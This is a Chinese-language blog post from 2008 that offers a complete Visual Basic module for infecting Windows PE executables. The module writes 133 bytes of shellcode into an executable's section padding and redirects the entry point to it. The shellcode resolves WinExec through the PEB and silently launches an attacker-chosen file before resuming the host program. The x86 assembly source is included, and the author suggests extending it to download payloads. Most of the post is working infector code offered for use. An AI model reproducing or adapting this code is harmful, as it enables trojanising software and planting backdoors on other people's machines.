BlackFeather'S Blog

首页 | |

感染PE的代码--VB

 

vb版感染PE的代码
作者:BlackFeather
出处:Lenk技术联盟 , 转载请注明出处

原来看过一份所谓的VB版感染文件的代码,其实就是把文件写到另一个文件的末尾,这是个毛感染啊  貌似网上VB版的感染也不多 我发出来一份

感染PE似乎是新手一个不敢涉足的东西,其实还是比较简单的,我偶尔看到了一个见缝插针的小程序,后来联想到了这个感染方式。

见缝插针的功能是把一个小后门(例如1KB以下的下载者等等)先写到目标程序的00区,然后继续在00去加一段代码调用kernel32._lwrite写文件和winexec执行,修改文件入口到这段代码,执行完毕后再跳回去。思路相当好,没有新加区段,PE文件大小也不变。但是缺点就是他调用kernel32的函数的时候用的是本机的函数内存地址,没有用搜索,所以只能在本机使用,换一个机子执行这个被感染的程序就根本不能执行。

这个方法感觉跟加花程序很像很像,我的想法就有了,找一段Shellcode(什么功能自己看着办),然后写到区段的00区,然后修改入口点到Shellcode ,执行完了再跳回原入口!Shellcode使用了寻址调用winexec函数,比上述的程序的通用性要高多了,下面这段代码中用的Shellcode是seer同学的,代码我也附上了。

为了新手的使用方便,我整理成了一个模块,调用函数InfectPE(要感染的文件,要运行的文件名)
注:因为Shellcode的原因,要运行的文件名不能大于12个字符  比如12345678.exe 不能再长了  代码执行成功的话返回值为1 ,并且在目标程序的目录下生成 目标文件名.exe的新程序,运行这个被感染的EXE就会运行当前目录下的12345678.exe了

感染PE的模块代码:


Attribute VB_Name = "ModInfectPE"
Option Explicit

Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)

Private Type SectionHeader
    Name As String * 8
    RVA As Long
    VirtualSize As Long
    PhysicalSize As Long
    Offset As Long
    flags As Long
End Type

Private Const NeededArea As Long = 133

Dim PE() As Byte, e_lfanew As Long, NumberOfSections As Long, SizeOfOptionalHeader As Long, AddressOfEntryPoint As Long, NumberOfRvaAndSizes As Long
Dim EncStart As Long, EncEnd As Long, SectionTableOffset As Long, SectionTable() As SectionHeader, EntrySection As Long, PaddingArea As Long, tmp As Long
Dim PatchCode(NeededArea - 1) As Byte

Public Function InfectPE(ByVal strTargetFile As String, ByVal strRunFile As String) As Long

On Error GoTo ERR: '设置错误陷坑

'感染的Shellcode
PatchCode(0) = &H60
PatchCode(1) = &H55
PatchCode(2) = &H83
PatchCode(3) = &HEC
PatchCode(4) = &H40
PatchCode(5) = &H8B
PatchCode(6) = &HEC
PatchCode(7) = &H55
PatchCode(8) = &H64
PatchCode(9) = &HA1
PatchCode(10) = &H30
PatchCode(11) = &H0
PatchCode(12) = &H0
PatchCode(13) = &H0
PatchCode(14) = &H8B
PatchCode(15) = &H40
PatchCode(16) = &HC
PatchCode(17) = &H8B
PatchCode(18) = &H70
PatchCode(19) = &H1C
PatchCode(20) = &HAD
PatchCode(21) = &H8B
PatchCode(22) = &H78
PatchCode(23) = &H8
PatchCode(24) = &H8B
PatchCode(25) = &H47
PatchCode(26) = &H3C
PatchCode(27) = &H8B
PatchCode(28) = &H54
PatchCode(29) = &H7
PatchCode(30) = &H78
PatchCode(31) = &H3
PatchCode(32) = &HD7
PatchCode(33) = &H8B
PatchCode(34) = &H4A
PatchCode(35) = &H18
PatchCode(36) = &H8B
PatchCode(37) = &H5A
PatchCode(38) = &H20
PatchCode(39) = &H3
PatchCode(40) = &HDF
PatchCode(41) = &H49
PatchCode(42) = &H8B
PatchCode(43) = &H34
PatchCode(44) = &H8B
PatchCode(45) = &H3
PatchCode(46) = &HF7
PatchCode(47) = &HB8
PatchCode(48) = &H47
PatchCode(49) = &H65
PatchCode(50) = &H74
PatchCode(51) = &H50
PatchCode(52) = &H39
PatchCode(53) = &H6
PatchCode(54) = &H75
PatchCode(55) = &HF1
PatchCode(56) = &HB8
PatchCode(57) = &H72
PatchCode(58) = &H6F
PatchCode(59) = &H63
PatchCode(60) = &H41
PatchCode(61) = &H39
PatchCode(62) = &H46
PatchCode(63) = &H4
PatchCode(64) = &H75
PatchCode(65) = &HE7
PatchCode(66) = &H8B
PatchCode(67) = &H5A
PatchCode(68) = &H24
PatchCode(69) = &H3
PatchCode(70) = &HDF
PatchCode(71) = &H66
PatchCode(72) = &H8B
PatchCode(73) = &HC
PatchCode(74) = &H4B
PatchCode(75) = &H8B
PatchCode(76) = &H5A
PatchCode(77) = &H1C
PatchCode(78) = &H3
PatchCode(79) = &HDF
PatchCode(80) = &H8B
PatchCode(81) = &H4
PatchCode(82) = &H8B
PatchCode(83) = &H3
PatchCode(84) = &HC7
PatchCode(85) = &H89
PatchCode(86) = &H45
PatchCode(87) = &H40
PatchCode(88) = &H68
PatchCode(89) = &H78
PatchCode(90) = &H65
PatchCode(91) = &H63
PatchCode(92) = &H0
PatchCode(93) = &H68
PatchCode(94) = &H57
PatchCode(95) = &H69
PatchCode(96) = &H6E
PatchCode(97) = &H45
PatchCode(98) = &H54
PatchCode(99) = &H57
PatchCode(100) = &HFF
PatchCode(101) = &H55
PatchCode(102) = &H40
PatchCode(103) = &H89
PatchCode(104) = &H45
PatchCode(105) = &H8
PatchCode(106) = &H6A
PatchCode(107) = &H0
PatchCode(108) = &H68
PatchCode(109) = &H2E
PatchCode(110) = &H65
PatchCode(111) = &H78
PatchCode(112) = &H65
PatchCode(113) = &H68
PatchCode(114) = &H35
PatchCode(115) = &H36
PatchCode(116) = &H37
PatchCode(117) = &H38
PatchCode(118) = &H68
PatchCode(119) = &H31
PatchCode(120) = &H32
PatchCode(121) = &H33
PatchCode(122) = &H34
PatchCode(123) = &H54
PatchCode(124) = &HFF
PatchCode(125) = &H55
PatchCode(126) = &H8
PatchCode(127) = &H61
PatchCode(128) = &HE9

''''''''''''''''''''''''''''''''''''''''''''''调用winexec执行当前目录下某文件的Shellcode

Dim i As Long, p As Long, q As Long

If Len(strRunFile) > 12 Then MsgBox "要运行的文件的长度太长了,俺的Shellcode写不下···", , "MSGBOX": Exit Function
   
If Dir(strTargetFile) = "" Then MsgBox "目标文件貌似不存在吧···", , "MSGBOX": Exit Function


'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''用最笨的方法修改Shellcode

PatchCode(119) = "&H" & Hex(Asc(Mid(strRunFile, 1, 1)))
PatchCode(120) = "&H" & Hex(Asc(Mid(strRunFile, 2, 1)))
PatchCode(121) = "&H" & Hex(Asc(Mid(strRunFile, 3, 1)))
PatchCode(122) = "&H" & Hex(Asc(Mid(strRunFile, 4, 1)))

strRunFile = Mid(strRunFile, 5, Len(strRunFile) - 4)

If Len(strRunFile) > 4 Then
     
         For i = 1 To 4

               PatchCode(113 + i) = "&H" & Hex(Asc(Mid(strRunFile, i, 1)))
                         
         Next
        
               strRunFile = Mid(strRunFile, 5, Len(strRunFile) - 4)
              
               Dim j As Integer
              
               For j = 1 To Len(strRunFile)
                   
                    PatchCode(108 + j) = "&H" & Hex(Asc(Mid(strRunFile, j, 1)))
                   
               Next
              
               If Len(strRunFile) <> 4 Then PatchCode(110 + Len(strRunFile)) = &H0

    ElseIf Len(strRunFile) = 4 Then
        
         For i = 1 To 4

               PatchCode(113 + i) = "&H" & Hex(Asc(Mid(strRunFile, i, 1)))
              
               PatchCode(109) = &H0
     
         Next
        
    Else
       
         For i = 1 To Len(strRunFile)
              
               PatchCode(113 + i) = "&H" & Hex(Asc(Mid(strRunFile, i, 1)))
              
         Next
        
         PatchCode(114 + Len(strRunFile)) = &H0
        
End If

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''修改Shellcode完毕,累死我了调试了N次,光发晕

ReDim PE(FileLen(strTargetFile) - 1)  '重定义PE的大小
   
Open strTargetFile For Binary As #1  '读取PE
Get #1, , PE
Close #1
   

e_lfanew = ReadDword(&H3C&)

NumberOfSections = ReadWord(e_lfanew + 6)
   
   
SizeOfOptionalHeader = ReadWord(e_lfanew + &H14&)
   
AddressOfEntryPoint = ReadWord(e_lfanew + &H28&) '原入口点

If SizeOfOptionalHeader >= &H60& Then
        NumberOfRvaAndSizes = ReadDword(e_lfanew + &H74&)
   Else
        NumberOfRvaAndSizes = 0
End If
   
If NumberOfRvaAndSizes > 16 Then NumberOfRvaAndSizes = 16

If NumberOfRvaAndSizes > (SizeOfOptionalHeader - &H60&) \ 8 Then NumberOfRvaAndSizes = (SizeOfOptionalHeader - &H60&) \ 8

NumberOfRvaAndSizes = NumberOfRvaAndSizes - 1
   
EncStart = 0: EncEnd = &H7FFFFFFF
    For i = 0 To NumberOfRvaAndSizes
        p = ReadDword(e_lfanew + &H78& + i * 8)
        q = p + ReadDword(e_lfanew + &H7C& + i * 8)
       
        If p < 0 Or p > q Then
            Exit Function
        ElseIf p < AddressOfEntryPoint And q < AddressOfEntryPoint Then
            If q >= EncStart Then EncStart = q + 1
        ElseIf p > AddressOfEntryPoint And q > AddressOfEntryPoint Then
            If p <= EncEnd Then EncEnd = p - 1
        Else
            Exit Function
        End If
       
    Next

    NumberOfSections = NumberOfSections - 1

    SectionTableOffset = e_lfanew + &H18& + SizeOfOptionalHeader
    EntrySection = -1
   
    ReDim SectionTable(NumberOfSections)

    For i = 0 To NumberOfSections '开始分析区段
        With SectionTable(i)
       
            .Name = Read8Str(SectionTableOffset + i * &H28&)
            .VirtualSize = ReadDword(SectionTableOffset + i * &H28& + &H8&)
            .RVA = ReadDword(SectionTableOffset + i * &H28& + &HC&)
            .PhysicalSize = ReadDword(SectionTableOffset + i * &H28& + &H10&)
            .Offset = ReadDword(SectionTableOffset + i * &H28& + &H14&)
            .flags = ReadDword(SectionTableOffset + i * &H28& + &H24&)
           
            If EntrySection = -1 Then
                If (AddressOfEntryPoint >= .RVA) And (AddressOfEntryPoint <= .RVA + .VirtualSize) Then EntrySection = i
            End If
           
        End With
    Next

    If EntrySection = -1 Then Exit Function


With SectionTable(EntrySection)

        PaddingArea = .PhysicalSize - .VirtualSize

        If PaddingArea < NeededArea Then

           Exit Function
          
        End If
       
        For i = .Offset + .VirtualSize To .Offset + .PhysicalSize - 1
            If PE(i) <> 0 Then
                If MsgBox("Padding Area seems to have data, do you really want to continue?", vbQuestion Or vbYesNo) = vbYes Then
                    Exit For
                Else
                    Exit Function
                End If
            End If
        Next
       
        If .RVA > EncStart Then EncStart = .RVA
        If .RVA + .VirtualSize - 1 < EncEnd Then EncEnd = .RVA + .VirtualSize - 1

       
        tmp = AddressOfEntryPoint - (.RVA + .VirtualSize + NeededArea)
        CopyMemory PatchCode(129), tmp, 4
       
        CopyMemory PE(.Offset + .VirtualSize), PatchCode(0), NeededArea
       
        AddressOfEntryPoint = .RVA + .VirtualSize
        WriteDword e_lfanew + &H28&, AddressOfEntryPoint
       
        .VirtualSize = .VirtualSize + NeededArea
        WriteDword SectionTableOffset + EntrySection * &H28& + &H8&, .VirtualSize
       
        .flags = .flags Or &H80000000
        WriteDword SectionTableOffset + EntrySection * &H28& + &H24&, .flags
       
End With
   
Open strTargetFile & ".exe" For Binary As #1  '生成新文件
Put #1, , PE
Close #1
   
InfectPE = 1

Exit Function

ERR:

   InfectPE = 0

End Function

 

Private Function ReadWord(ByVal Offset As Long) As Long
    CopyMemory ReadWord, PE(Offset), 2
End Function

Private Function ReadDword(ByVal Offset As Long) As Long
    CopyMemory ReadDword, PE(Offset), 4
End Function


Private Sub WriteDword(ByVal Offset As Long, ByVal Data As Long)
    CopyMemory PE(Offset), Data, 4
End Sub

Private Function Add0To8(ByVal InputStr As String) As String
    Add0To8 = String(8 - Len(InputStr), "0") & InputStr
End Function

Private Function Read8Str(ByVal Offset As Long) As String
    Dim i As Long, c As Byte, s As String
    For i = 0 To 7
         c = PE(Offset + i)
         If c < 32 Or c > 127 Then c = 32
         s = s & Chr(c)
    Next
    Read8Str = s
End Function

——————————————————————————————————————————————————-——

这个感染的功能很单调,可以写Shellcode,完成更多功能。比如调用fileexists函数查看文件是否存在,然后选择URLDOWNTOFILEA函数下载恢复等等···

Shellcode代码:


        push   ebp
        sub    esp, 0x40;
        mov    ebp, esp;
        push   ebp
        mov    eax, fs:0x30      
        mov    eax, [eax+0x0c]    ;Ldr
        mov    esi, [eax+0x1c]    ;Flink
        lodsd
        mov    edi, [eax+0x08]    ;edi = kernel32.dll
           
        mov    eax, [edi+3Ch]     ;eax = PE首部
        mov    edx, [edi+eax+78h]
        add    edx, edi           ;edx = 输出表地址
        mov    ecx, [edx+18h]     ;ecx = 输出函数个数
        mov    ebx, [edx+20h]                
        add    ebx, edi           ;ebx = 函数名地址
       
search:
        dec     ecx
        mov     esi, [ebx+ecx*4]               
        add     esi, edi          ;依次找每个函数名称
        ;GetProcAddress
        mov     eax, 0x50746547
        cmp     [esi], eax        ;'PteG'
        jne     search
        mov     eax, 0x41636f72
        cmp     [esi+4], eax      ;'Acor'
        jne     search
        ;如果是GetProcA,表示找到了
        mov     ebx, [edx+24h]
        add     ebx, edi          ;ebx = 索引号地址
        mov     cx,  [ebx+ecx*2]  ;ecx = 计算出的索引号值
        mov     ebx, [edx+1Ch]
        add     ebx, edi          ;ebx = 函数地址的起始位置
        mov     eax, [ebx+ecx*4]
        add     eax, edi          ;用索引值,算GetProcAddress
        mov     [ebp+40h], eax    ;GetProcAddress的地址=ebp+40
        push    dword ptr 0x00636578   ;//构造WinExec
        push    dword ptr 0x456e6957
        push    esp
        push    edi
        call    [ebp+40h]              ;//执行GetProcAddress
        mov     [ebp+8h], eax          ;//存入WinExec的地址 到[ebp+8h]
   
                push    0
                push    dword ptr 0x6578652e
                push    dword ptr 0x38373635
                push    dword ptr 0x34333231  //12345678.exe
                push    esp
                Call    [ebp+8h]                           ;//调用winexec执行同一目录下的12345678.exe

————————————————————————————————————————————

大家玩好!

basic其实很强悍的,没有别人说的那么垃圾   垃圾的是VB  推荐使用powerbasic来编译  很牛的一个编译器

发出来一个示例:

200810051925168425.gz

 

2008/10/5 | Tags:原创,VB,编程 | VB编程 | 查看评论(0)

相关文章:

Powered By Z-Blog  触屏版 | WAP版 | 电脑版